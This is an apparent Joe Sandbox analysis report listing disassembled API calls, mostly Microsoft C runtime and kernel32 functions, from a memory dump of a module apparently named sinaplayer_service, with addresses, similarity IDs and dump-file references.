                                                                                                                                                                                                      • Part of subcall function 6D0B2C27: _malloc_crt.MSVCR120(00000008,?,6D0FC85C,00000000,00000000,00000000,00000001,00000000), ref: 6D0B2C2C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _malloc_crt_wcspbrk_wmatch
                                                                                                                                                                                                    • String ID: y[
                                                                                                                                                                                                    • API String ID: 2060052928-3866484319
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __output_l.LIBCMT ref: 6D096F2A
                                                                                                                                                                                                      • Part of subcall function 6D096C0F: _errno.MSVCR120(?,?,?,00000000), ref: 6D096C84
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D59E6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D59F1
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6D0D5A03
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__output_l_flsbuf_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 531506805-1255198513
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D0DB524
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0DB5B0,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D0DB532
                                                                                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT(Bad read pointer - no RTTI data!,?,6D0DB5B0,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D0DB53F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Attempted a typeid of NULL pointer!, xrefs: 6D0DB51C
                                                                                                                                                                                                    • Bad read pointer - no RTTI data!, xrefs: 6D0DB537
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::bad_exception::bad_exception$ExceptionThrow
                                                                                                                                                                                                    • String ID: Attempted a typeid of NULL pointer!$Bad read pointer - no RTTI data!
                                                                                                                                                                                                    • API String ID: 20138871-236372618
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ctrlfp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1574075368-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___libm_error_support.LIBCMT ref: 6D0C40A3
                                                                                                                                                                                                      • Part of subcall function 6D156158: DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6D0C417F), ref: 6D156174
                                                                                                                                                                                                      • Part of subcall function 6D156158: _errno.MSVCR120 ref: 6D156215
                                                                                                                                                                                                    • __ctrlfp.LIBCMT ref: 6D1569AF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodePointer___libm_error_support__ctrlfp_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3902546397-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EA974
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EA994
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EAA46
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EAAA6
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,00000000,?,?,?,6D0E9D78,?,?,?,?), ref: 6D0EAAAF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2717317152-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000000), ref: 6D0EE699
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,?,?,00000000), ref: 6D0EE6B8
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,?,00000000), ref: 6D0EE76B
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000), ref: 6D0EE7CB
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,00000000), ref: 6D0EE7D3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2717317152-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D105128,00000008), ref: 6D104FA8
                                                                                                                                                                                                    • _errno.MSVCR120(6D105128,00000008), ref: 6D104FC0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D105128,00000008), ref: 6D105118
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4106058386-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D0963D0,00000008), ref: 6D0963F4
                                                                                                                                                                                                    • _errno.MSVCR120(6D0963D0,00000008), ref: 6D0D5446
                                                                                                                                                                                                    • _errno.MSVCR120(6D0963D0,00000008), ref: 6D0D5453
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0963D0,00000008), ref: 6D0D5466
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Block@Context@Concurrency@@SAXXZ.MSVCR120(?,?,?,00000000,00000000,000000FF,?,?,?,?,?,?,?), ref: 6D0EF594
                                                                                                                                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCMT ref: 6D0EF59B
                                                                                                                                                                                                      • Part of subcall function 6D0EF2BE: free.MSVCR120(000000FF,6D0EF5A0,?,?,?,00000000,00000000,000000FF,?,?,?,?,?,?,?), ref: 6D0EF2D5
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(000000FF,?,?,00000000,00000000), ref: 6D0EF5FE
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(00000000,6D15CFBC,000000FF,?,?,00000000), ref: 6D0EF613
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,000000FF,?,00000000,6D15CFBC,000000FF,?,?,00000000), ref: 6D0EF622
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$Block@Concurrency::details::Concurrency@@Context@DerefExceptionLockNodeNode::QueueThrowTimerfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 983439244-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D0AFD98,00000010), ref: 6D0AFD28
                                                                                                                                                                                                    • __freebuf.LIBCMT ref: 6D0AFD38
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?,?,?,6D0AFD98,00000010), ref: 6D0AFD61
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AFD98,00000010), ref: 6D0D5919
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AFD98,00000010), ref: 6D0D5924
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __freebuf_errno_invalid_parameter_noinfo_lock_file_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1322749186-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000002,00000000,?,?,?,6D09BF6E,00000000), ref: 6D09B06A
                                                                                                                                                                                                    • memmove.MSVCR120(00000001,00000002,00000001,00000002,00000000,?,?,?,6D09BF6E,00000000), ref: 6D09B073
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6D09BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6D0D3F50
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,6D09BF6E,00000000,?,00000001,?,?,?,00000000,00000000,00000002), ref: 6D0D3F5A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,6D09BF6E,00000000), ref: 6D0D3F66
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfomemmovestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4167440682-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0F5B41
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000030,6D0F2161,?,00000000,?,?,?), ref: 6D0F5B58
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,?), ref: 6D0F5B7B
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6D0F5BE0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?), ref: 6D0F5BEE
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterH_prolog3_Leavefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2469348259-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnicoll_l.MSVCR120(?,?,?,00000000), ref: 6D0A9547
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DACED
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0DACF8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_wcsnicoll_l
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR120(000000FF), ref: 6D124536
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,0000004C), ref: 6D12454E
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6D1245FD
                                                                                                                                                                                                    • __crtUnhandledException.MSVCR120(?), ref: 6D12460C
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR120(000000FF), ref: 6D124623
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _crt_debugger_hook$DebuggerExceptionPresentUnhandled__crtmemset
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__mbsrtowcs_helper_invalid_parameter_noinfo
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F89FA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6D0F8A0C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6D15D0DC,00000014), ref: 6D0F8A21
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                      • Part of subcall function 6D0F887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6D0F8AB2,?,?,?,00000014), ref: 6D0F8895
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                      • Part of subcall function 6D0E9E5E: Concurrency::location::operator==.LIBCMT ref: 6D0E9E8E
                                                                                                                                                                                                      • Part of subcall function 6D0E9E5E: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0E9EDA
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6D0F8A5A
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6D0F8A94
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency::location::operator==Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F8AED
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000014), ref: 6D0F8AFF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,?,?,?,?,?,?,?,6D15D0DC,00000014), ref: 6D0F8B14
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                      • Part of subcall function 6D0F887D: ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000000,6D0F8AB2,?,?,?,00000014), ref: 6D0F8895
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                      • Part of subcall function 6D0E9FA4: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0E9FB2
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?,?,?,00000014), ref: 6D0F8B4D
                                                                                                                                                                                                    • Concurrency::details::TaskStack::Push.LIBCMT ref: 6D0F8B84
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Exception$??0exception@std@@??2@?wait@event@Base::Concurrency@@ContextCreateH_prolog3_catchPushQueueRaiseStack::TaskThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3410968691-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__wcsrtombs_helper_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1232677100-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?), ref: 6D0A3E2B
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 6D0D3099
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0E99EE
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A15
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000080,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A31
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A60
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000080,00000008,6D0EA446,?,?,?,00000000,?,6D0EA65B), ref: 6D0E9A7F
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@$H_prolog3
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2611423129-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2556715357-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AC248,0000000C), ref: 6D0B2280
                                                                                                                                                                                                    • _local_unwind4.MSVCR120(6D15F7B8,?,000000FE,6D0AC248,0000000C), ref: 6D0B2296
                                                                                                                                                                                                      • Part of subcall function 6D0AC264: _wsopen_s.MSVCR120(?,?,00000000,?,00000180,?,00000000,?,?,?,?,6D0AC22A,?,?,?,00000000), ref: 6D0AC32B
                                                                                                                                                                                                      • Part of subcall function 6D0AC1B2: _unlock_file.MSVCR120(00000000,6D0AC23E), ref: 6D0AC1B3
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AC248,0000000C), ref: 6D0B22A5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AC248,0000000C), ref: 6D0D5F0B
                                                                                                                                                                                                      • Part of subcall function 6D095857: _lock.MSVCR120(00000001,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D09586C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AC248,0000000C), ref: 6D0D5F15
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_local_unwind4_lock_unlock_file_wsopen_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 494836370-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A047F
                                                                                                                                                                                                    • _isatty.MSVCR120(00000000,?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0485
                                                                                                                                                                                                    • __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0491
                                                                                                                                                                                                    • __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A04A1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00001000,?,0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A05B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$_fileno_isatty_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1391627188-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?), ref: 6D0EC812
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0EC82A
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0EC864
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?), ref: 6D0EC879
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,6D0E754C,6D15CEE8,?), ref: 6D0EC888
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$??0exception@std@@ExceptionThrowValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3255388332-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2E7E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2E96
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2EE0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2EE6
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CC2,00000004,6D0F249A), ref: 6D0F2EF6
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,6D0EAF12), ref: 6D0EAF79
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,6D0EAF12), ref: 6D0EAF81
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,?,6D0EAF12), ref: 6D0EAF89
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,?,?,6D0EAF12), ref: 6D0EAF91
                                                                                                                                                                                                      • Part of subcall function 6D0EAF6F: free.MSVCR120(?,?,?,?,?,?,6D0EAF12), ref: 6D0EAF97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1955102368-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000), ref: 6D0AA119
